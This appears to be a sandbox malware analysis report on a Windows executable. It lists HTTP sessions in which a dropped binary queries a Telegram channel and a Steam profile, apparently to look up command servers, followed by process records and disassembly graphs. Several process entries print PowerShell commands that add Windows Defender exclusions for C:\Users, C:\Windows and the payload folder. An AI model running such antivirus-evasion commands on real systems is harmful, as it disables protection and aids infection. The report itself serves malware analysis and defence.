                                                                                                                                                                                                                        2024-12-23 07:52:59 UTC971INData Raw: 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 6c 69 6e 6b 66 69 6c 74 65 72 2f 3f 75 3d 68 74 74 70 25 33 41 25 32 46 25 32 46 77 77 77 2e 67 65 6f 6e 61 6d 65 73 2e 6f 72 67 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 20 6e 6f 6f 70 65 6e 65 72 22 3e 67 65 6f 6e 61 6d 65 73 2e 6f 72 67 3c 2f 61 3e 2e 09 09 09 09 09 3c 62 72 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 76 61 6c 76 65 5f 6c 69 6e 6b 73 22 3e 0a 09 09 09 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 70 72 69 76 61 63 79 5f 61 67 72 65 65 6d 65 6e 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 50 72 69
                                                                                                                                                                                                                        Data Ascii: "https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org" target="_blank" rel=" noopener">geonames.org</a>.<br><span class="valve_links"><a href="http://store.steampowered.com/privacy_agreement/" target="_blank">Pri


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        6192.168.2.849719149.154.167.994436532C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2024-12-23 07:53:32 UTC143OUTGET /m3wm0w HTTP/1.1
                                                                                                                                                                                                                        Host: t.me
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Cookie: stel_ssid=d6d3627e300141e072_9285031639468439323
                                                                                                                                                                                                                        2024-12-23 07:53:33 UTC368INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: nginx/1.18.0
                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 07:53:33 GMT
                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                        Content-Length: 9538
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Cache-control: no-store
                                                                                                                                                                                                                        X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                        Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                        Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                                        2024-12-23 07:53:33 UTC9538INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6d 33 77 6d 30 77 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @m3wm0w</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        7192.168.2.849720104.102.49.2544436532C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2024-12-23 07:53:34 UTC215OUTGET /profiles/76561199804377619 HTTP/1.1
                                                                                                                                                                                                                        Host: steamcommunity.com
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Cookie: sessionid=a683bfea8aad978e31b0518e; steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186
                                                                                                                                                                                                                        2024-12-23 07:53:35 UTC1733INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                        Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                                                                                                                                                        Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 07:53:35 GMT
                                                                                                                                                                                                                        Content-Length: 35590
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2024-12-23 07:53:35 UTC14651INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                        2024-12-23 07:53:35 UTC16384INData Raw: 09 09 09 09 09 09 4d 61 72 6b 65 74 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74
                                                                                                                                                                                                                        Data Ascii: Market</a><a class="submenuitem" href="https://steamcommunity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About
                                                                                                                                                                                                                        2024-12-23 07:53:35 UTC3584INData Raw: 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6c 65 76 65 6c 5f 62 74 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 70 72 6f 66 69 6c 65 73 2f 37 36 35 36 31 31 39 39 38 30 34 33 37 37 36 31 39 2f 62 61 64 67 65 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6c 65 76 65 6c 22 3e 4c 65 76 65 6c 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 72 69 65 6e 64 50 6c 61 79 65 72 4c 65 76 65 6c 20 6c 76 6c 5f 30 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 72 69 65 6e 64 50 6c 61 79 65 72 4c 65 76 65 6c 4e 75 6d 22 3e 30 3c
                                                                                                                                                                                                                        Data Ascii: OnActivate&quot;:true}" class="persona_level_btn" href="https://steamcommunity.com/profiles/76561199804377619/badges"><div class="persona_name persona_level">Level <div class="friendPlayerLevel lvl_0"><span class="friendPlayerLevelNum">0<
                                                                                                                                                                                                                        2024-12-23 07:53:35 UTC971INData Raw: 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 6c 69 6e 6b 66 69 6c 74 65 72 2f 3f 75 3d 68 74 74 70 25 33 41 25 32 46 25 32 46 77 77 77 2e 67 65 6f 6e 61 6d 65 73 2e 6f 72 67 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 20 6e 6f 6f 70 65 6e 65 72 22 3e 67 65 6f 6e 61 6d 65 73 2e 6f 72 67 3c 2f 61 3e 2e 09 09 09 09 09 3c 62 72 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 76 61 6c 76 65 5f 6c 69 6e 6b 73 22 3e 0a 09 09 09 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 70 72 69 76 61 63 79 5f 61 67 72 65 65 6d 65 6e 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 50 72 69
                                                                                                                                                                                                                        Data Ascii: "https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org" target="_blank" rel=" noopener">geonames.org</a>.<br><span class="valve_links"><a href="http://store.steampowered.com/privacy_agreement/" target="_blank">Pri


                                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                        Start time:02:51:47
                                                                                                                                                                                                                        Start date:23/12/2024
                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\YYjRtxS70h.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\YYjRtxS70h.exe"
                                                                                                                                                                                                                        Imagebase:0x650000
                                                                                                                                                                                                                        File size:13'793'970 bytes
                                                                                                                                                                                                                        MD5 hash:5A59CE92B07DE68C0BE8FBD7944214E2
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:1
                                                                                                                                                                                                                        Start time:02:51:47
                                                                                                                                                                                                                        Start date:23/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                                        Start time:02:51:51
                                                                                                                                                                                                                        Start date:23/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\VmTatwGQo'"
                                                                                                                                                                                                                        Imagebase:0x1e0000
                                                                                                                                                                                                                        File size:433'152 bytes
                                                                                                                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                                                        Start time:02:51:51
                                                                                                                                                                                                                        Start date:23/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                        Start time:02:51:52
                                                                                                                                                                                                                        Start date:23/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\VmTatwGQo
                                                                                                                                                                                                                        Imagebase:0x1e0000
                                                                                                                                                                                                                        File size:433'152 bytes
                                                                                                                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                                        Start time:02:51:53
                                                                                                                                                                                                                        Start date:23/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                        Imagebase:0x7ff605670000
                                                                                                                                                                                                                        File size:496'640 bytes
                                                                                                                                                                                                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                                                        Start time:02:51:56
                                                                                                                                                                                                                        Start date:23/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                                                                                                                                                                                                                        Imagebase:0x1e0000
                                                                                                                                                                                                                        File size:433'152 bytes
                                                                                                                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                                        Start time:02:51:56
                                                                                                                                                                                                                        Start date:23/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                                        Start time:02:51:56
                                                                                                                                                                                                                        Start date:23/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users
                                                                                                                                                                                                                        Imagebase:0x1e0000
                                                                                                                                                                                                                        File size:433'152 bytes
                                                                                                                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                                        Start time:02:52:01
                                                                                                                                                                                                                        Start date:23/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
                                                                                                                                                                                                                        Imagebase:0x1e0000
                                                                                                                                                                                                                        File size:433'152 bytes
                                                                                                                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                        Start time:02:52:01
                                                                                                                                                                                                                        Start date:23/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                                                        Start time:02:52:02
                                                                                                                                                                                                                        Start date:23/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Windows
                                                                                                                                                                                                                        Imagebase:0x1e0000
                                                                                                                                                                                                                        File size:433'152 bytes
                                                                                                                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:14
                                                                                                                                                                                                                        Start time:02:52:17
                                                                                                                                                                                                                        Start date:23/12/2024
                                                                                                                                                                                                                        Path:C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe"
                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                        File size:476'160 bytes
                                                                                                                                                                                                                        MD5 hash:F453C5F8C736FF8C381E7022CAD85E3E
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                        • Detection: 63%, ReversingLabs
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:17
                                                                                                                                                                                                                        Start time:02:52:26
                                                                                                                                                                                                                        Start date:23/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage:21%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                          Total number of Nodes:3
                                                                                                                                                                                                                          Total number of Limit Nodes:0
                                                                                                                                                                                                                          execution_graph 2819 2831170 2820 28311b2 GetConsoleWindow 2819->2820 2821 28311f2 2820->2821

                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                          Function 02830A40 Relevance: .4, Instructions: 432COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 13 2830a40-2830a68 14 2830a6a 13->14 15 2830a6f-2830ac5 call 28310e0 call 2831317 13->15 14->15 18 2830ac7-2830ad0 15->18 19 2830ad5-2830ccc 15->19 22 2831091-28310d6 18->22 51 2830daf-2830dc3 19->51 52 2830cd1-2830d17 51->52 53 2830dc9-2830dde 51->53 56 2830d19 52->56 57 2830d1e-2830d51 52->57 58 2830e5b-2830e77 53->58 56->57 65 2830d53 57->65 66 2830d58-2830dac 57->66 59 2830de0-2830e1f 58->59 60 2830e7d-2830e95 58->60 68 2830e21 59->68 69 2830e26-2830e3e 59->69 61 2830e97-2830edb 60->61 62 2830ede-2830f1c call 283013c 60->62 61->62 81 2830f24-2830fa2 call 283014c 62->81 65->66 66->51 68->69 77 2830e46-2830e58 69->77 77->58 88 2830fa8-283102c 81->88 89 283102e-2831036 81->89 92 2831037-2831038 88->92 89->92 92->22
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1790699871.0000000002830000.00000040.00000800.00020000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2830000_YYjRtxS70h.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 75cb2a84473f8c33be91873517b27827fc9733365ced039de9c0356e94d826e5
                                                                                                                                                                                                                          • Instruction ID: 9d136861aa2351bb5e105ddb0f0b7dd133219be7fdcffcfc3f320250f22a21c6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 75cb2a84473f8c33be91873517b27827fc9733365ced039de9c0356e94d826e5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A312C878E00218CFDB55DFA9C984B9DBBB2FF88700F108559E809AB369DB70A945CF50
                                                                                                                                                                                                                          Function 02832309 Relevance: .2, Instructions: 203COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 164 2832309-2832340 165 2832342 164->165 166 2832347-28323d9 164->166 165->166 171 28325c8-28325d1 166->171 172 28325d7-28325de 171->172 173 28323de-28323e7 171->173 174 28323e9 173->174 175 28323ee-28324fb call 28319ac call 28319bc 173->175 174->175 193 2832525-2832540 175->193 194 28324fd-2832518 175->194 199 2832541-283255c 193->199 197 2832520-2832523 194->197 197->199 201 2832568 199->201 202 283255e 199->202 201->171 203 2832567 202->203 203->201
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1790699871.0000000002830000.00000040.00000800.00020000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2830000_YYjRtxS70h.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: b8cb1fbd8ca4de75483121325bd629c929866d82e8b0890112e9012e20b99588
                                                                                                                                                                                                                          • Instruction ID: 32db58d994e3b7c52f6d9775b2fa704845e29b974b1ad91d72b953066ba22ffa
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b8cb1fbd8ca4de75483121325bd629c929866d82e8b0890112e9012e20b99588
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 20811878E01208CFDB18DFA9D994A9EFBB2FF89300F209529D805AB354DB359946CF50
